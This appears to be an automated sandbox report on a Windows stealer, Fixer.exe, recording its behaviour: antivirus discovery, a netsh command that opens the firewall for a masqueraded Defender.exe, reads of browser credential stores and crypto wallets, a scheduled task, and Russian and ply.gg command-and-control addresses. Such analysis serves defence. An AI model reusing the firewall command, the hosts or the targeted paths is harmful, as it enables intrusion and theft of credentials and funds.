                  Source: C:\Users\user\Desktop\Fixer.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Fixer.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Fixer.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Fixer.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Fixer.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\FixerNerest.exe VolumeInformation
                  Source: C:\Windows\System32\Defender.exe | Queries volume information: C:\Windows\System32\Defender.exe VolumeInformation
                  Source: C:\Users\user\Desktop\Fixer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Lowering of HIPS / PFW / Operating System Security Settings

                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe | Process created: C:\Windows\System32\cmd.exe "CMD" netsh advfirewall firewall add rule name=",%MUc}<NcMKXc_" dir=in action=allow program="C:\Windows\System32\Defender.exe" enable=yes & exit
                  Source: Amcache.hve.14.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.14.dr | Binary or memory string: msmpeng.exe
                  Source: Amcache.hve.14.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: FixerNerest.exe, 00000004.00000002.2386714575.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp, Defender.exe, 0000000B.00000002.2582504451.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, Defender.exe, 00000011.00000002.2761764861.000000001B100000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: Amcache.hve.14.dr | Binary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\Fixer.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Fixer.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Fixer.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Fixer.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Fixer.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Fixer.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Windows\System32\Defender.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  Source: Yara match | File source: Fixer.exe, type: SAMPLE
                  Source: Yara match | File source: dump.pcap, type: PCAP
                  Source: Yara match | File source: 0.0.Fixer.exe.fd0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000000.1999968498.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: Fixer.exe PID: 2520, type: MEMORYSTR
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ElectrumE#
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $]q2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.walletLR]q
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum\walletsLR]ql
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Exodus Movement Inc1
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $]q%appdata%`,]qdC:\Users\user\AppData\Roaming`,]qdC:\Users\user\AppData\Roaming\Binance
                  Source: Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: EthereumE#
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $]q&%localappdata%\Coinomi\Coinomi\walletsLR]q
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: $]q6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                  Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                  Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                  Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Roaming\atomic\
                  Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Roaming\Binance\
                  Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                  Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                  Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                  Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                  Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                  Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                  Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\
                  Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\
                  Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                  Source: Yara match | File source: 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: Fixer.exe PID: 2520, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: Fixer.exe, type: SAMPLE
                  Source: Yara match | File source: dump.pcap, type: PCAP
                  Source: Yara match | File source: 0.0.Fixer.exe.fd0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000000.1999968498.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: Fixer.exe PID: 2520, type: MEMORYSTR
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 321 Windows Management Instrumentation | 1 Scheduled Task/Job | 11 Process Injection | 121 Masquerading | 1 OS Credential Dumping | 451 Security Software Discovery | Remote Services | 1 Screen Capture | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 11 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 351 Virtualization/Sandbox Evasion | Security Account Manager | 351 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 3 Data from Local System | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | 12 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 213 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  [Behavior Graph: ID: 1585853, Sample: Fixer.exe, Startdate: 08/01/2025, Architecture: WINDOWS, Score: 100]

                  Source | Detection | Scanner | Label | Link
                  Fixer.exe | 74% | Virustotal | | Browse
                  Fixer.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.RedLineStealz |
                  Fixer.exe | 100% | Joe Sandbox ML | |

                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe | 100% | Avira | HEUR/AGEN.1310090 |
                  C:\Windows\System32\Defender.exe | 100% | Avira | TR/Crypt.OPACK.Gen |
                  C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe | 100% | Joe Sandbox ML | |
                  C:\Users\user\AppData\Local\Temp\FixerNerest.exe | 100% | Joe Sandbox ML | |

                  No Antivirus matches
                  No Antivirus matches

                  Source | Detection | Scanner | Label | Link
                  http://89.23.97.121:1911 | 0% | Avira URL Cloud | safe |
                  89.23.97.121:1112 | 0% | Avira URL Cloud | safe |
                  http://ocsp.sectigo.com0$ | 0% | Avira URL Cloud | safe |

                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  et-seattle.gl.at.ply.gg | 147.185.221.24 | true | false | | unknown

                  Name | Malicious | Antivirus Detection | Reputation
                  89.23.97.121:1112 | true | Avira URL Cloud: safe | unknown

                  Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/faultFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsatFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://tempuri.org/Entity/Id15ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://tempuri.org/Entity/Id5ResponseDFixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe, 00000004.00000002.2386899345.00000000027E6000.00000004.00000800.00020000.00000000.sdmp, Defender.exe, 0000000B.00000002.2583497749.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, Defender.exe, 00000011.00000002.2754426575.0000000002546000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://tempuri.org/Entity/Id6ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://api.ip.sb/ipFixer.exefalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/scFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://tempuri.org/Entity/Id1ResponseDFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://tempuri.org/Entity/Id9ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Fixer.exe, 00000000.00000002.2220918461.00000000042DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://tempuri.org/Entity/Id20Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://tempuri.org/Entity/Id21Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://tempuri.org/Entity/Id22Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://tempuri.org/Entity/Id23Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://tempuri.org/Entity/Id24Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://tempuri.org/Entity/Id24ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.ecosia.org/newtab/Fixer.exe, 00000000.00000002.2220918461.00000000042DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://tempuri.org/Entity/Id1ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://ocsp.sectigo.com0$Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://tempuri.org/Entity/Id21ResponseDFixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressingFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/trustFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://tempuri.org/Entity/Id10Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://tempuri.org/Entity/Id11Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://tempuri.org/Entity/Id10ResponseDFixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://tempuri.org/Entity/Id12Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://tempuri.org/Entity/Id16ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://tempuri.org/Entity/Id13Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://tempuri.org/Entity/Id14Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://tempuri.org/Entity/Id15Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://tempuri.org/Entity/Id16Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/NonceFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://tempuri.org/Entity/Id17Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://tempuri.org/Entity/Id18Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Fixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://tempuri.org/Entity/Id5ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://tempuri.org/Entity/Id19Fixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://tempuri.org/Entity/Id15ResponseDFixer.exe, 00000000.00000002.2202938412.00000000033F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://tempuri.org/Entity/Id10ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RenewFixer.exe, 00000000.00000002.2202938412.0000000003336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://tempuri.org/Entity/Id11ResponseDFixer.exe, 00000000.00000002.2202938412.0000000003380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://tempuri.org/Entity/Id8ResponseFixer.exe, 00000000.00000002.2202938412.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    http://ocsp.sectigo.com0Fixer.exe, 00000000.00000002.2202938412.0000000003615000.00000004.00000800.00020000.00000000.sdmp, FixerNerest.exe.0.dr, Defender.exe.4.drfalse
                                                                                                                                                                                                                      high
IP | Domain | Country | ASN | ASN Name | Malicious
89.23.97.121 | unknown | Russian Federation | 48687 | MAXITEL-ASRU | true
147.185.221.24 | et-seattle.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1585853
Start date and time: 2025-01-08 11:14:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 19s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Fixer.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@18/14@1/2
EGA Information:
• Successful, ratio: 40%
HCA Information:
• Successful, ratio: 83%
• Number of executed functions: 93
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.21, 20.42.73.29, 4.245.163.56, 23.1.237.91, 13.107.246.45, 40.126.31.71
• Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target 6z9uno0baqvej0me.exe, PID 528 because it is empty
• Execution Graph export aborted for target Defender.exe, PID 1684 because it is empty
• Execution Graph export aborted for target FixerNerest.exe, PID 5480 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
05:15:03 | API Interceptor | 73x Sleep call for process: Fixer.exe modified
05:15:50 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
11:15:31 | Task Scheduler | Run new task: WindowsAPI path: C:\Windows\System32\Defender.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
89.23.97.121 | q3JT7kcpCR.exe | malicious | DCRat | 89.23.97.121/Flowerprocessorjavascriptvideo/eternalbigload/test/4/Test/16Datalife8/HttpWpUploads/JsSqlSqlLine/UploadsCpuproton/Dbprotect/Local/Update/JsTemp/videolinepythonSql/flower/apiwordpressTest_/javascriptuniversal/ImageapiTemp.php
147.185.221.24 | spreadmalware.exe | malicious | XWorm |
147.185.221.24 | 7fqul5Zr8Y.exe | malicious | Unknown |
147.185.221.24 | loader.exe | malicious | Unknown |
147.185.221.24 | loader.exe | malicious | Unknown |
147.185.221.24 | P3A946MOFP.exe | malicious | XWorm |
147.185.221.24 | BootstrapperV1.16.exe | malicious | XWorm |
147.185.221.24 | SharkHack.exe | malicious | XWorm |
